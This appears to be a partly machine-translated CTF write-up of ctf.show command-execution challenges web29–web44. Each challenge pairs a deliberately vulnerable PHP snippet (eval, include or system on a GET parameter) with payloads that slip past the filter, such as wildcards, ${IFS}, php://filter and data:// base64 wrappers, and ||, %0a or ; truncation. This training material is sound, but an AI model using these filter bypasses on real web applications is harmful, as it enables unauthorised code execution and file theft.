foreword
In the middle of the night Wang Yiyun listens to music and emo
z
Brush up on the questions for a while or I won’t be able to fall asleep
红中(hong_zh0)
CSDN内容合伙人、2023年新星计划web安全方向导师、
华为MindSpore截至目前最年轻的优秀开发者、IK&N战队队长、
吉林师范大学网安大一的一名普通学生、搞网安论文拿了回大挑校二、
阿里云专家博主、华为网络安全云享专家、腾讯云自媒体分享计划博主
The three-swipe command is executed, I miss it
web29
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
The first question is equivalent to not filtering anything.
Payload:
?c=system("tac fl??????")//?通配符
?c=system("tac fl*");//*通配符
?c=system("tac fl\ag.php");//\分割
?c=system("tac fl''ag.php");//''分割
web30
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
Ban system(), consider alternatives
Payload:
?c=passthru("tac fl\ag.p\hp");
In the command execution, the system function can be replaced by
1, exec()
2, passthru()
3, backtick/shell_exec()
The difference is:
system()/passthru()
directly outputs the result to the browser
exec()/shell_exec()/backquote
needs to view the result through echo/return
web31
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
Compared with the previous question, filter more points: dots, spaces, single quotes
Payload:
?c=passthru("nl%09fl*");//纯绕
?c=eval($_GET[1]);&1=system("tac flag.php");//类似于一个跳板
Spaces are banned:
${IFS}
<
>
<>
%09
%0a (the main difference between the two is that the former is usually inserted in the middle and the latter is generally placed at the end)
Read file statement:
nl* (output with line numbers)
cat/tac (both one positive sequence and one reverse sequence)
About Springboard
It is known that the browser needs a variable named c. The principle of this springboard is that the value of c is to read another value, and this value will not be subject to any restrictions.
web32
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
This again (filtered, no move, use include to do
Payload:
?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
Just take a hackbar and run the pseudo-protocol later
Come out with a string of base64 codes
Decode the flag directly
web33-36
Killed with the method of the previous question
web37
<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
If you change your posture, you have to include it.
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
The data protocol contains, and then directly pass the command
<?php system('cat flag.php');?>
remember to encode
web38-web39
Use the above method to kill
web40
I am a color pen, no, it is recommended to watch the master WP ctf.show
web41
I forgot when I wrote it
。。。
I am a colored pencil (sure
web42
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
system($c." >/dev/null 2>&1");
}else{
highlight_file(__FILE__);
}
a strange thing appeared
>/dev/null 2>&1
It is recommended to read this blog >/dev/null 2>&1
Stream saving:
This thing is like a trash can, blocking all output and reporting errors
Payload:
?c=cat flag.php%0a//%0a截断
?c=cat flag.php||//||截断
?c=tac flag.php%26%26ls//传两个值进去,垃圾桶只能吃一个
?c=tac flag.php;//分号直接截断
web43
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
ban the semicolon
It's okay, || continue around
Payload:
?c=tac flag.php||
web44
The environment is no longer open, it is estimated that the flag is banned on the basis of the previous question
?c=tac fl*||
Stop writing, Gu Nai